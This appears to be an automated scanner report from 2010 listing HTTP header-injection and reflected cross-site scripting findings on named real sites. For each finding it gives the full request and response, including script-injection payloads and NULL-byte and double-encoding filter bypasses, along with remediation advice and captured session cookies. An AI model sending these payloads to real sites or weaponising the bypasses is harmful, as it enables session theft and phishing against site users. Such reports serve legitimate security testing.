HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 1ec36%0d%0aee4caf17b88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1ec36%0d%0aee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ec36
ee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27:
Date: Sat, 11 Dec 2010 17:58:38 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 71417%0d%0a24e536cd9bc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /71417%0d%0a24e536cd9bc/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http://demr.opt.fimserve.com/lnk/?ek=ACG08K6QAu-50ciAUFyu_g1vWRK6xCufeZRioGttipdpYIHhIo1Tmf-eAjPrq7qr8WSGmgZemaJVJcp1KTVV_GnIwIO3mcXAJHjXkvmqllx0JS5NB2zFE5u-R3oFsOsuu4gJ75KaWoQNK-CXPm2PoM7PcWgcny9V1viFVFjcJOjXnHwyusqsueyd0b3CHolEGMBY1V5Qn-rDwX4Z22CB5u1F7t9VUi55J1JTxHBTOb19yLgi32VSspuMsiu6GLXSFiFdBXWfllZ6v6Kl6uLimt6xLBZZR59aJJzQxuAO1qoIpa1OD3L6R1PDXzRcLE0Cpghref=;ord=1292087967885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=963501277&nwvert=2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5b51"><script>alert(1)</script>7a67c21e36c was submitted in the REST URL parameter 1. This input was echoed as b5b51"><script>alert(1)</script>7a67c21e36c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:44 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00bbe77<a>2359e70d7a6 was submitted in the REST URL parameter 1. This input was echoed as bbe77<a>2359e70d7a6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00bbe77<a>2359e70d7a6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:03:45 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 566c2<a>e6fcc6b2e57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base566c2<a>e6fcc6b2e57/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:04:23 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 11 Dec 2010 18:04:23 GMT
Last-Modified: Sat, 11 Dec 2010 18:04:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8
2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a146b"><script>alert(1)</script>c78c2ed554b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a146b\"><script>alert(1)</script>c78c2ed554b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?a146b"><script>alert(1)</script>c78c2ed554b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008d248"><script>alert(1)</script>a888f0f5543 was submitted in the REST URL parameter 1. This input was echoed as 8d248"><script>alert(1)</script>a888f0f5543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%008d248"><script>alert(1)</script>a888f0f5543 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the exp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e996f"-alert(1)-"57ce3775cd6 was submitted in the exp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /annual2010/public/MainHall.aspx?ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 18:07:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b1hztn55j3hxyw454pesxjve; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30636
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html> <head> <meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n ...[SNIP]... the full path from the qurystring.
strFullPath="/annual2010/public/MainHall.aspx";
//Get only querystring
strQryValus="ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6";
arrstrFullPath=strFullPath.split("/");
//Commented By Tulsi on 170062005
//strfileName=arrstrFullPath[5];
//Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length-1
...[SNIP]...
2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.nrf.com
Path: /annual2010/public/MainHall.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b66"-alert(1)-"e35552360be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /annual2010/public/MainHall.aspx?79b66"-alert(1)-"e35552360be=1 HTTP/1.1
Host: events.nrf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 17:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuh00mfdl5xuqg452jimav45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30444
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html> <head> <meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n ...[SNIP]... r strLang1="";
var strLang2="";
//Get the full path from the qurystring.
strFullPath="/annual2010/public/MainHall.aspx";
//Get only querystring
strQryValus="79b66"-alert(1)-"e35552360be=1";
arrstrFullPath=strFullPath.split("/");
//Commented By Tulsi on 170062005
//strfileName=arrstrFullPath[5];
//Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66 was submitted in the REST URL parameter 1. This input was echoed as 3ed32<img src=a onerror=alert(1)>d81d4c9e66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66/eventcenter/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:23 GMT
Server: Apache
Content-Length: 114
Set-Cookie: JSESSIONID=bMqHND8XhR6xdC4Z7g07qXWGR9RbyzJNtDmDxyygJDBvrZX2yQKb!-2086176403; path=/
Connection: close
Content-Type: text/html
Invalid path /ec0605lb3ed32<img src=a onerror=alert(1)>d81d4c9e66/eventcenter/recording/recordAction was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9 was submitted in the REST URL parameter 2. This input was echoed as 9d92c<img src=a onerror=alert(1)>b4c765c70c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb/eventcenter9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9/recording/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:27 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=L6BFND8bBTYMxXwwjl1kCft6FRJKL9qcdq6VlGt8nTDF4DP39wf6!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html
Invalid path /eventcenter9d92c<img src=a onerror=alert(1)>b4c765c70c9/recording/recordAction was requested
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19 was submitted in the REST URL parameter 3. This input was echoed as 3e04b<img src=a onerror=alert(1)>edd90b20f19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb/eventcenter/recording3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19/recordAction.do HTTP/1.1
Host: googleonline.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:30 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=10vZND8pxx1kb88rC5wnwyXY12p8SVCYpyYQVGlrlvwg1t74CmgJ!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html
Invalid path /eventcenter/recording3e04b<img src=a onerror=alert(1)>edd90b20f19/recordAction was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9802<script>alert(1)</script>e9157f8b18e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /oauth/authorizee9802<script>alert(1)</script>e9157f8b18e?client_id=8744a0ccdce1491c4474dacf75dc2d12&redirect_uri=http://www.myspace.com/fbocallback&scope=email,offline_access,user_about_me,user_birthday,user_likes,publish_stream&display=popup HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e."
Set-Cookie: datr=QbcDTSBbj9Vvh3G0O-kWlzIe; expires=Mon, 10-Dec-2012 17:39:13 GMT; path=/; domain=.facebook.com; httponly
Connection: close
Date: Sat, 11 Dec 2010 17:39:13 GMT
Content-Length: 151
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a62"%3balert(1)//831b24e6265 was submitted in the REST URL parameter 2. This input was echoed as 73a62";alert(1)//831b24e6265 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62"%3balert(1)//831b24e6265 HTTP/1.1
Host: mike2.openmethodology.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:13:19 GMT
Server: Apache/2.2.17 (Unix)
X-Powered-By: PHP/5.2.14
Pragma: no-cache
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: openmeth_omwikidb_omw__session=o23sch2m9uit36jtq3cp8c5ho7; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]... <script type="text/javascript">a2a_linkname="Fusing Enterprise Search and Social Bookmarking73a62";alert(1)//831b24e6265";a2a_linkurl="http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62%22;alert(1)//831b24e6265"; a2a_onclick=1;</script> ...[SNIP]...
2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://msdn.microsoft.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d48"><a>3d147823d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?f6d48"><a>3d147823d73=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25588
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?f6d48"><a>3d147823d73=1" /> ...[SNIP]...
2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://msdn.microsoft.com
Path: /cc300389.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5db99"><a>00ccaba71ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cc300389.aspx?5db99"><a>00ccaba71ba=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30835
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/cc300389.aspx?5db99"><a>00ccaba71ba=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b5a%2522%253e%253ca%253e034bccb92c5 was submitted in the REST URL parameter 1. This input was echoed as 76b5a"><a>034bccb92c5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
